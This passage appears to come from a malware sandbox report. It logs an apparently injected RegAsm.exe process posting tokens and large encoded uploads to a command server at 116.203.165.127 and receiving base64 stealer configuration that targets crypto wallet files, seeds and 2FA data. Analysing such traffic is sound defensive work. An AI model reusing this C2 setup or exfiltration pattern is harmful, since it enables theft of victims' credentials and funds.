                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                                                                                Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                                                                                Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                                                                                Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.949782116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:20 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 1145
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:20 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------IDAEHCFHJJJJECAAFBKJCont
                                                                                                                                                                                                                                2024-09-21 11:35:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.949784116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:24 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------EGIDAAFIEHIEHJKFHCAECont
                                                                                                                                                                                                                                2024-09-21 11:35:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:24 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:24 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.949785116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:25 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------EGIDAAFIEHIEHJKFHCAECont
                                                                                                                                                                                                                                2024-09-21 11:35:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:26 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                                                                                Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.2.949786116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:27 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 461
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:27 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------JKKEHJDHJKFIECAAKFIJCont
                                                                                                                                                                                                                                2024-09-21 11:35:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:28 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.949788116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC283OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGI
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 122469
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------FBKJKEHIJECGCBFIJEGICont
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79 4b 44 79 4b 57 69 67 59 33 50 34 69 6b 36 55 34 39 36 62 6a 69 67 59 66 68 52 31 2f 2b 76 53 38 34 39 61 51 38 2b 31 41 78 44 7a 52 6a 4e 4c 2b 6c 4a 6a 50 2b 46 41 43 66 68 2b 64 48 57 69 6c 4e 41 78 75 4f 4f 39 4a 32 70 78 39 36 51 30 77 45 6f 49 39 61 4f 6c 42 39 71 51 78 50 38 6d 6b 48 34
                                                                                                                                                                                                                                Data Ascii: JRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDyKDyKWigY3P4ik6U496bjigYfhR1/+vS849aQ8+1AxDzRjNL+lJjP+FACfh+dHWilNAxuOO9J2px96Q0wEoI9aOlB9qQxP8mkH4
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 54 6e 2f 41 42 2f 43 6d 54 65 42 2f 45 63 4d 2f 6c 66 32 63 37 38 34 44 6f 36 6c 54 2b 4f 65 50 78 72 70 76 44 32 69 52 2b 46 5a 7a 63 36 68 4c 45 2b 72 50 47 66 4a 74 6f 7a 75 38 70 54 31 5a 76 35 66 34 39 76 72 63 78 7a 44 44 55 63 4c 4f 63 70 4a 71 7a 4d 38 4c 68 71 30 71 30 56 61 32 70 70 58 51 56 4c 79 64 56 2b 36 73 6a 41 66 54 4e 59 48 69 51 41 32 45 52 37 69 55 44 39 44 57 75 57 4a 4a 4a 4f 53 65 74 63 2f 34 6a 6e 42 61 47 41 48 70 6c 32 2f 70 2f 57 76 79 62 68 6d 4d 71 32 63 55 6e 44 6f 32 2f 52 57 66 2f 44 48 31 48 45 4d 34 30 73 73 71 63 33 56 4a 66 4f 36 4d 4b 6b 35 70 61 4b 2f 61 7a 38 6a 43 69 69 69 67 44 76 64 5a 51 58 73 2f 67 7a 54 5a 75 62 61 59 2b 62 49 6e 5a 69 6b 61 6b 41 2b 33 4a 2f 4f 70 50 47 75 73 36 6a 62 36 6e 70 6d 6b 61 66 64
                                                                                                                                                                                                                                Data Ascii: Tn/AB/CmTeB/EcM/lf2c784Do6lT+OePxrpvD2iR+FZzc6hLE+rPGfJtozu8pT1Zv5f49vrcxzDDUcLOcpJqzM8Lhq0q0Va2ppXQVLydV+6sjAfTNYHiQA2ER7iUD9DWuWJJJOSetc/4jnBaGAHpl2/p/WvybhmMq2cUnDo2/RWf/DH1HEM40ssqc3VJfO6MKk5paK/az8jCiiigDvdZQXs/gzTZubaY+bInZikakA+3J/OpPGus6jb6npmkafd
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 56 4c 61 59 7a 73 4c 57 56 69 68 43 6e 44 71 46 77 76 41 7a 78 6b 38 64 65 61 6d 4e 2f 50 38 41 5a 35 66 73 75 6f 66 61 56 48 6c 59 6e 4b 4b 64 72 4d 34 42 58 67 41 64 4f 33 55 55 41 62 39 51 51 58 74 72 64 4d 79 32 39 7a 44 4d 56 2b 38 49 35 41 32 50 79 71 43 78 6b 6d 38 79 38 67 6d 6d 61 62 79 5a 41 71 75 77 41 4a 42 55 48 6e 41 41 37 2b 6c 5a 4e 6c 65 79 4c 6f 45 61 77 33 39 73 30 71 69 4a 51 73 53 6a 66 47 43 77 42 33 5a 4a 7a 31 39 42 51 42 30 6c 46 59 6b 31 78 64 77 2f 62 6a 39 72 63 72 41 38 63 59 4a 52 66 6c 55 68 4e 7a 6e 41 36 6a 4a 50 70 37 55 67 75 37 69 51 78 78 77 33 78 6b 69 65 36 45 61 33 4b 71 68 4c 4c 73 4a 49 48 47 30 34 49 36 67 66 31 6f 41 33 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f
                                                                                                                                                                                                                                Data Ascii: VLaYzsLWVihCnDqFwvAzxk8deamN/P8AZ5fsuofaVHlYnKKdrM4BXgAdO3UUAb9QQXtrdMy29zDMV+8I5A2PyqCxkm8y8gmmabyZAquwAJBUHnAA7+lZNleyLoEaw39s0qiJQsSjfGCwB3ZJz19BQB0lFYk1xdw/bj9rcrA8cYJRflUhNznA6jJPp7Ugu7iQxxw3xkie6Ea3KqhLLsJIHG04I6gf1oA3KKKKACiiigAooooAKKKKACiiigAoooo
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 74 53 59 39 2b 61 4d 35 6f 4a 39 36 51 41 54 6b 65 39 4a 53 6e 4a 70 4d 59 4e 41 7a 30 4f 6b 70 61 4b 79 50 6b 68 4b 57 69 69 67 42 4b 4b 4b 4b 42 68 52 52 52 53 41 4b 4b 4b 4b 41 43 69 6c 7a 52 54 41 53 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 6c 6f 6f 41 53 69 69 69 67 41 70 4d 55 74 46 49 42 4d 55 55 74 4a 69 6d 41 55 55 74 4a 69 67 41 6f 6f 78 52 69 67 41 70 4b 57 69 67 42 4b 4b 57 69 67 59 6c 46 4c 52 51 41 6c 46 46 46 41 42 53 55 74 46 41 43 55 55 55 43 6d 41 55 64 71 57 69 67 42 4b 4b 4b 4b 41 41 30 6c 4c 53 55 41 46 46 46 46 43 47 4a 52 51 61 4b 41 43 6b 70 61 54 76 51 4d 51 39 4b 69 65 70 6a 55 54 30 6d 56 48 63 39 45 2b 48 50 2f 49 41 75 66 38 41 72 37 62 2f 41 4e 41 53 75 77 72 6a 2f 68 7a 2f 41 4d 67 43 35 2f 36 2b 32 2f 38 41 51 45
                                                                                                                                                                                                                                Data Ascii: tSY9+aM5oJ96QATke9JSnJpMYNAz0OkpaKyPkhKWiigBKKKKBhRRRSAKKKKACilzRTASiiigAooooAKKKKACilooASiiigApMUtFIBMUUtJimAUUtJigAooxRigApKWigBKKWigYlFLRQAlFFFABSUtFACUUUCmAUdqWigBKKKKAA0lLSUAFFFFCGJRQaKACkpaTvQMQ9KiepjUT0mVHc9E+HP/IAuf8Ar7b/ANASuwrj/hz/AMgC5/6+2/8AQE
